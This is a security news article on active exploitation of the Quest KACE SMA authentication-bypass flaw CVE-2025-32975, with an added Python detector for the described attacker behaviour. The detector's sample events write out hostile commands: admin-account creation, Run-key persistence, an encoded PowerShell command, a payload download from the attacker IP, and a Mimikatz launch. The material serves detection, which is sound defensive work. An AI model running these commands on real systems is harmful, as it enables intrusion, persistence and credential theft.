A serious cybersecurity threat has emerged as experts warn that attackers are actively exploiting a critical flaw in Quest KACE Systems Management Appliance (SMA) to gain control over unpatched systems.
The vulnerability, identified as CVE-2025-32975 with a CVSS score of 10.0, allows threat actors to bypass authentication on administrative accounts and log in as legitimate users. Although it was patched in May 2025, recent reports indicate that exploitation activity began in the second week of March 2026, mainly targeting internet-exposed SMA instances.
According to findings by cybersecurity researchers, attackers used this flaw to take over administrative accounts and execute remote commands. These commands were used to download Base64-encoded payloads from server 216.126.225[.]156.
Experts observed that attackers leveraged the “runkbot.exe” process to create additional admin accounts. This process is part of the SMA Agent and is typically used to run scripts and manage installations. PowerShell scripts were also deployed to modify Windows Registry entries, likely to maintain access or change system configurations.
Other malicious activities included credential theft using Mimikatz, system discovery by identifying logged-in users and admin accounts, and running commands like “net time” and “net group.” Attackers also gained remote access through RDP to backup systems such as Veeam and Veritas, along with domain controllers.
Cybersecurity specialists have advised organisations to avoid exposing SMA instances to the internet and to immediately apply the latest patches. Secured versions include 13.0.385, 13.1.81, 13.2.183, 14.0.341 (Patch 5), and 14.1.101 (Patch 4).
Experts caution that such attacks can go beyond system control and lead to data theft, network-wide movement, and long-term unauthorised access. “Any administrative system lacking timely patching provides cybercriminals with a direct entry point,” Arctic Wolf noted.
Organisations are also advised to monitor credentials, track registry changes, and log remote commands. Regular checks of agent and backup services are recommended to detect unusual activity early.
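The monitoring advice above, together with the post-exploitation behaviour described earlier (runkbot.exe creating admin accounts, PowerShell registry changes, encoded payloads from the named host, net time/net group discovery, Mimikatz), can be turned into a small set of detection rules run over process-creation telemetry. The following is an added example, not code from the article, Quest, or Arctic Wolf. The event records, their field names (parent, image, cmdline, user) and every command line in them are constructed for illustration; the only indicators taken from the article are the runkbot.exe process name and the payload host 216.126.225.156. Adapt the field names to your own EDR or Sysmon schema.

```python
import re
from collections import Counter

# Indicators taken from the article: the SMA Agent's script runner and the
# server the Base64-encoded payloads were fetched from.
SMA_AGENT_RUNNER = "runkbot.exe"
PAYLOAD_HOST = "216.126.225.156"

# Behaviour patterns (constructed for this example, not vendor signatures).
ACCOUNT_ADD = re.compile(r"\bnet(?:\.exe)?\s+(?:user|localgroup)\b.*\s/add\b", re.I)
DISCOVERY = re.compile(r"\bnet(?:\.exe)?\s+(?:time|group)\b", re.I)
REG_MODIFY = re.compile(r"Set-ItemProperty|New-ItemProperty|\breg(?:\.exe)?\s+add\b", re.I)
B64_PAYLOAD = re.compile(r"-enc(?:odedcommand)?\b|FromBase64String", re.I)

# Constructed process-creation events; hostnames, account names, paths and
# the encoded blob are placeholders, not real observations.
SAMPLE_EVENTS = [
    {"parent": "runkbot.exe", "image": "net.exe", "user": "SYSTEM",
     "cmdline": "net user svc_backup P@ss /add"},
    {"parent": "runkbot.exe", "image": "net.exe", "user": "SYSTEM",
     "cmdline": "net localgroup administrators svc_backup /add"},
    {"parent": "runkbot.exe", "image": "powershell.exe", "user": "SYSTEM",
     "cmdline": "powershell.exe -NoP -Command \"Set-ItemProperty -Path "
                "'HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run' "
                "-Name Updater -Value 'C:\\ProgramData\\u.exe'\""},
    {"parent": "runkbot.exe", "image": "powershell.exe", "user": "SYSTEM",
     "cmdline": "powershell.exe -NoP -EncodedCommand QUJDREVGR0hJSktMTU5P"},
    {"parent": "cmd.exe", "image": "powershell.exe", "user": "SYSTEM",
     "cmdline": "powershell.exe -Command \"Invoke-WebRequest -Uri "
                "http://216.126.225.156/stage.b64 -OutFile C:\\ProgramData\\stage.b64\""},
    {"parent": "cmd.exe", "image": "net.exe", "user": "CORP\\svc_backup",
     "cmdline": "net time \\\\DC01"},
    {"parent": "cmd.exe", "image": "net.exe", "user": "CORP\\svc_backup",
     "cmdline": "net group \"Domain Admins\" /domain"},
    {"parent": "cmd.exe", "image": "mimikatz.exe", "user": "SYSTEM",
     "cmdline": "mimikatz.exe"},
    # Legitimate SMA agent activity: a software install, expected to stay quiet.
    {"parent": "runkbot.exe", "image": "msiexec.exe", "user": "SYSTEM",
     "cmdline": "msiexec /i agentpkg.msi /qn"},
    {"parent": "explorer.exe", "image": "notepad.exe", "user": "CORP\\alice",
     "cmdline": "notepad.exe report.txt"},
]


def classify(event):
    """Return the list of detection tags that apply to one process-creation event."""
    cmd = event["cmdline"]
    image = event["image"].lower()
    from_agent = event["parent"].lower() == SMA_AGENT_RUNNER
    tags = []
    # The SMA script runner creating accounts or adding them to the admin group
    if from_agent and ACCOUNT_ADD.search(cmd):
        tags.append("agent-spawned-account-creation")
    # PowerShell that edits the registry (persistence / config change)
    if image.startswith("powershell") and REG_MODIFY.search(cmd):
        tags.append("powershell-registry-change")
    # Encoded command lines or any reference to the payload host
    if PAYLOAD_HOST in cmd or B64_PAYLOAD.search(cmd):
        tags.append("encoded-or-remote-payload")
    # "net time" / "net group" style discovery
    if DISCOVERY.search(cmd):
        tags.append("net-discovery")
    # Credential-dumping tool identified by image name
    if "mimikatz" in image:
        tags.append("credential-dumping-tool")
    return tags


def scan(events):
    """Return [(index, tags)] for every event that triggered at least one tag."""
    hits = []
    for i, event in enumerate(events):
        tags = classify(event)
        if tags:
            hits.append((i, tags))
    return hits


def summarize(events):
    """Count how often each tag fires across the whole event set."""
    counts = Counter()
    for _, tags in scan(events):
        counts.update(tags)
    return dict(counts)


if __name__ == "__main__":
    for idx, tags in scan(SAMPLE_EVENTS):
        e = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {e['parent']} -> {e['image']}: {', '.join(tags)}")
    print(summarize(SAMPLE_EVENTS))
```

The agent-spawned-account-creation rule is keyed on the parent process on purpose: runkbot.exe legitimately runs scripts and installers, so the install event in the sample set stays quiet while account and admin-group changes launched by it are flagged. The discovery and credential-tool rules are intentionally not tied to the agent, since the article places those steps later in the intrusion, after RDP access to backup servers and domain controllers.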
The incident highlights the importance of strong patch management, network segmentation, strict access controls, and continuous cybersecurity training to prevent future attacks.